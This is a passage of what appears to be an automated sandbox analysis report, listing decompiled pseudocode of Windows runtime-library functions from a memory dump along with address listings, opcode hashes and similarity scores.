					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E030595D0();
							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0302EB70(_t54, 0x31079a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E030595D0();
								L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0302EB70(_t54, 0x31079a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0305F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0302EB70(_t54, 0x31079a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E030595D0();
							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x03015220
0x03015224
0x03070d13
0x03070d16
0x03070d19
0x0301522a
0x0301522a
0x0301522d
0x0301522d
0x03015231
0x03015235
0x03015239
0x03070d5c
0x03070d62
0x00000000
0x00000000
0x03070d6a
0x03070d7b
0x03070d7f
0x03070d81
0x03070d84
0x03070d95
0x03070d95
0x03070d6c
0x03070d71
0x03070d71
0x03070d9a
0x00000000
0x0301524a
0x0301524a
0x03015250
0x03070d24
0x03070d35
0x03070d39
0x03070d3b
0x03070d3e
0x03070d50
0x03070d50
0x03070d26
0x03070d2b
0x03070d2b
0x00000000
0x03070d55
0x03015256
0x0301525b
0x03015265
0x03070da7
0x0301526b
0x0301526e
0x03015272
0x03070db1
0x03070db4
0x03070dc5
0x03070dc5
0x03015272
0x03015278
0x0301527e
0x0301528a
0x0301528c
0x0301528d
0x00000000
0x03015280
0x03015282
0x03015288
0x0301529f
0x03015292
0x00000000
0x03015292
0x00000000
0x03015288
0x0301527e

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb2e85692091eb08cd1e09b0101411169c1c97005b88f6a9a1535c596e1df340
Instruction ID: 9a7d52ccfaa3d8d95e02417a0c26c5ca4af4d97196e8470579aefaf0f7a8f6ec
Opcode Fuzzy Hash: bb2e85692091eb08cd1e09b0101411169c1c97005b88f6a9a1535c596e1df340
Instruction Fuzzy Hash: 5831D332A53710EBC762EB18CC40BAAB7A9FF92760F154B19E8550F590E760ED10C794

Uniqueness

Uniqueness Score: -1.00%

Function 0304A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0304A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x30f0220);
				E0306D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x3107b9c; // 0x0
				_t55 = L03034620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0306D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x3107b10 =  *0x3107b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x310536c; // 0x1420ae0
					if( *_t51 != 0x3105368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x3105368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x310536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0304A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0304a61c
0x0304a61e
0x0304a623
0x0304a628
0x0304a62b
0x0304a62d
0x0304a648
0x0304a64a
0x0304a64f
0x03089b44
0x0304a6ec
0x0304a6f1
0x0304a6f1
0x0304a655
0x0304a657
0x0304a65a
0x0304a65d
0x0304a662
0x0304a663
0x0304a667
0x0304a668
0x0304a66d
0x0304a706
0x0304a706
0x03089bda
0x03089be6
0x03089beb
0x00000000
0x03089beb
0x0304a679
0x03089b7a
0x00000000
0x03089b7a
0x0304a683
0x0304a6f4
0x0304a6f7
0x0304a6f9
0x0304a6fd
0x0304a6a0
0x0304a6a0
0x0304a6ad
0x0304a6af
0x0304a6b4
0x03089ba7
0x03089bac
0x00000000
0x00000000
0x03089bc6
0x03089bce
0x03089bd1
0x03089bd3
0x03089bd3
0x00000000
0x03089bd1
0x0304a6bd
0x0304a6c3
0x0304a6c6
0x0304a6d2
0x0304a701
0x0304a704
0x00000000
0x0304a704
0x0304a6d4
0x0304a6d6
0x0304a6d9
0x0304a6db
0x0304a6e1
0x0304a6e6
0x0304a6e8
0x0304a6e8
0x0304a6ea
0x00000000
0x0304a6ea
0x0304a688
0x0304a692
0x0304a694
0x0304a699
0x00000000
0x00000000
0x0304a69d
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c64112f83b13e7ffa48daace415cb95460ae8f6764b2264742844cde763590c3
Instruction ID: f2e27c0d3d95aa466cd03f383e3b5de9ea1a25f246290ef4be7e7bdecf390b30
Opcode Fuzzy Hash: c64112f83b13e7ffa48daace415cb95460ae8f6764b2264742844cde763590c3
Instruction Fuzzy Hash: 7E415CB5A46205DFCB14DF58C990BAEBBF1BF49304F198069E804AF344C774A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 03053D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03053D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E03027B60(0, _t61, 0x2ff11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E03027B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L03034620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x03053d4c
0x03053d50
0x03053d55
0x03053d5e
0x0308e79a
0x00000000
0x0308e79a
0x03053d68
0x0308e789
0x03053d9d
0x03053da3
0x03053daf
0x03053db5
0x03053dbc
0x03053dc4
0x03053dc9
0x03053dce
0x0308e7ae
0x0308e7ae
0x03053dde
0x03053de2
0x03053de7
0x03053e0d
0x03053e13
0x03053e16
0x03053e1e
0x03053e25
0x03053e28
0x00000000
0x00000000
0x03053e2a
0x03053e2f
0x03053e37
0x03053e37
0x00000000
0x03053e37
0x03053e31
0x00000000
0x03053e31
0x03053e20
0x03053e20
0x03053e35
0x00000000
0x03053de9
0x03053de9
0x03053de9
0x03053dee
0x03053dfd
0x03053dff
0x03053e02
0x03053e05
0x03053e05
0x00000000
0x03053df0
0x03053de7
0x0308e78f
0x0308e794
0x03053d79
0x03053d84
0x03053d89
0x03053d8e
0x00000000
0x0308e7a4
0x03053d96
0x03053d9a
0x00000000
0x03053d9a
0x00000000
0x0308e794
0x03053d6e
0x03053d73
0x00000000
0x0308e7b5
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 070db7cbb798bbdcd347dc46ac491cc495dea99bc50b1a43cb477b518d37abdb
Instruction ID: a0c0b5573e58ac0a3f980890e59b6b1b078371924752656299550db4c95c9865
Opcode Fuzzy Hash: 070db7cbb798bbdcd347dc46ac491cc495dea99bc50b1a43cb477b518d37abdb
Instruction Fuzzy Hash: 6731B039602624DBC725CF29D441B7BBBF9EF8578070984AAF846CB390E730D840C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0303C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0303C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E03037D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E030E8D34(_v8, _t80);
					}
					E03032280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0302FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E030E8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0302FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0305B180();
						if(_a4 != 0) {
							E03032280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0303BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0303BB2D(_t16, _t15);
						E0303B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0302FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0302FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0302FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0303c18d
0x0303c18f
0x0303c191
0x0303c19b
0x0303c1a0
0x0303c1d4
0x0303c1de
0x03082d6e
0x0303c1e4
0x0303c1e4
0x0303c1e4
0x0303c1ec
0x03082d7d
0x03082d7d
0x0303c1f3
0x0303c1ff
0x03082d88
0x03082d8d
0x03082d94
0x03082d94
0x03082d9f
0x03082da4
0x03082dab
0x03082db0
0x03082db2
0x03082db3
0x03082db4
0x03082dbc
0x03082dc3
0x03082dc3
0x0303c205
0x0303c205
0x0303c208
0x0303c20e
0x0303c211
0x0303c216
0x0303c219
0x0303c21f
0x0303c222
0x0303c22c
0x0303c234
0x0303c23a
0x0303c23f
0x0303c245
0x0303c24b
0x0303c251
0x0303c25a
0x0303c276
0x0303c27d
0x0303c27d
0x0303c25c
0x0303c25c
0x00000000
0x0303c25e
0x0303c1a4
0x0303c1aa
0x0303c1b3
0x0303c265
0x0303c26c
0x0303c26c
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 8a6f4113ac0f59f8c5dde01e304398fa4fa0cde9fd1daa32f6d32c8b2e6e6b62
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 0231397560774ABEE744EBB4C480BE9FBACBF87244F08855AD41C9B201DB346905D790

Uniqueness

Uniqueness Score: -1.00%

Function 03097016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E03097016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x310d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E03096B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E03096B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E03037D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03059AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0305B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L03034620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x03097016
0x0309701e
0x0309702b
0x03097033
0x03097037
0x0309703c
0x0309703e
0x03097041
0x03097045
0x0309704a
0x03097050
0x03097055
0x0309705a
0x03097062
0x03097062
0x0309705a
0x03097064
0x03097064
0x03097067
0x03097071
0x03097096
0x0309709b
0x030970a2
0x030970a6
0x030970a7
0x030970ad
0x030970b3
0x030970b6
0x030970bb
0x030970c3
0x030970c3
0x030970c6
0x030970cd
0x030970dd
0x030970e0
0x030970e2
0x030970e2
0x030970ee
0x03097101
0x030970f0
0x030970f9
0x030970f9
0x0309710a
0x0309710e
0x03097112
0x03097117
0x03097118
0x03097118
0x030970bb
0x0309711d
0x03097123
0x03097131
0x03097131
0x03097136
0x0309713d
0x0309713e
0x0309713f
0x0309714a
0x0309714a
0x03097084
0x03097088
0x00000000
0x0309708e
0x0309708e
0x03097092
0x00000000
0x03097092

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abeb9114497a084324d17c69f284547d101fca82357c722341a47bcf6fa76e25
Instruction ID: e39e6a305281190a6630d65322714c65a4ad2e2ee6ce7a731f99a9f676def35b
Opcode Fuzzy Hash: abeb9114497a084324d17c69f284547d101fca82357c722341a47bcf6fa76e25
Instruction Fuzzy Hash: A631C676605751DBD724DF2CC840AABB3E9BFC8B00F054A2AF8958B690E730E904D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 030C3D40, Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E030C3D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x310d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E03032280(_t34, 0x3108a6c);
				_t64 =  *0x3105768; // 0x77f05768
				if(_t64 != 0x3105768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77f05770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E0302FFB0(_t53, _t64, 0x3108a6c);
						 *0x310b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E03032280(_t45, 0x3108a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x3105768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E0302FFB0(_t51, _t64, 0x3108a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0305B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x030c3d40
0x030c3d48
0x030c3d52
0x030c3d59
0x030c3d5d
0x030c3d61
0x030c3d63
0x030c3d67
0x030c3d69
0x030c3d72
0x030c3d76
0x030c3d7a
0x030c3d7f
0x030c3d8b
0x030c3d91
0x030c3d91
0x030c3d91
0x030c3d94
0x030c3d96
0x030c3d9d
0x030c3da1
0x030c3db0
0x030c3dba
0x030c3dbc
0x030c3dbc
0x030c3dc6
0x030c3dcb
0x030c3dcf
0x030c3dd1
0x030c3dd4
0x00000000
0x00000000
0x030c3dd9
0x030c3e0c
0x030c3e0c
0x030c3e0f
0x030c3ddb
0x030c3ddb
0x030c3de0
0x00000000
0x030c3de2
0x030c3de2
0x030c3de4
0x030c3de8
0x030c3deb
0x030c3df1
0x00000000
0x030c3df3
0x030c3df3
0x030c3df5
0x030c3df8
0x030c3dfa
0x00000000
0x030c3dfa
0x030c3df1
0x030c3de0
0x030c3e11
0x030c3e11
0x00000000
0x030c3dfe
0x030c3e04
0x030c3e06
0x00000000
0x030c3e06
0x00000000
0x030c3e04
0x030c3d91
0x030c3e15
0x030c3e1a
0x030c3e1f
0x030c3e1f
0x030c3e23
0x030c3e29
0x00000000
0x00000000
0x030c3e2e
0x00000000
0x030c3e30
0x030c3e30
0x030c3e35
0x00000000
0x030c3e37
0x030c3e3e
0x030c3e42
0x030c3e48
0x030c3e4e
0x00000000
0x030c3e4e
0x030c3e35
0x00000000
0x030c3e2e
0x030c3e5b
0x030c3e5c
0x030c3e5d
0x030c3e68
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3567db24b0d4598ee0f2fa71d87eb475ca1a33f7bfc93577d88da7f4a2cb0747
Instruction ID: d024805c97f1eeb16289ff6ff1fa3e3e2b25c3a1b40ad60486749aba269ee6c0
Opcode Fuzzy Hash: 3567db24b0d4598ee0f2fa71d87eb475ca1a33f7bfc93577d88da7f4a2cb0747
Instruction Fuzzy Hash: 6F31BC7552A342CFC714DF14D58055EBBE5FFC9614F0888AEE4989B281D374D904CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0304A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0304A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x3107b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x3107b10 = 8;
					 *0x3107b14 = 0x3107b0c;
					 *0x3107b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0304A990(0x3107b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0304A840(__edx, __ecx, __ecx, _t52, 0x3107b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x3107b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x3107b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x3107b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L03034620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x3107b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0305F3E0(_t50,  *0x3107b14, _t8 >> 3);
						_t28 =  *0x3107b14; // 0x77f07b0c
						__eflags = _t28 - 0x3107b0c;
						if(_t28 != 0x3107b0c) {
							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x3107b14 = _t50;
						_t48 = _v12;
						 *0x3107b10 = _t9;
						goto L6;
					}
					 *0x3107b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0304a713
0x0304a714
0x0304a717
0x0304a71d
0x0304a720
0x0304a722
0x0304a727
0x0304a74a
0x0304a754
0x0304a75e
0x0304a768
0x0304a76a
0x0304a773
0x0304a78b
0x0304a790
0x0304a792
0x0304a741
0x0304a741
0x0304a743
0x0304a749
0x0304a749
0x0304a732
0x0304a73a
0x0304a797
0x0304a79d
0x0304a7a3
0x0304a7a9
0x0304a7b6
0x0304a7bc
0x0304a7ca
0x0304a7e0
0x0304a7e2
0x0304a7e4
0x03089bf2
0x00000000
0x03089bf2
0x0304a7ed
0x0304a7f2
0x0304a800
0x0304a805
0x0304a80d
0x0304a812
0x03089c08
0x03089c08
0x0304a818
0x0304a81b
0x0304a821
0x0304a824
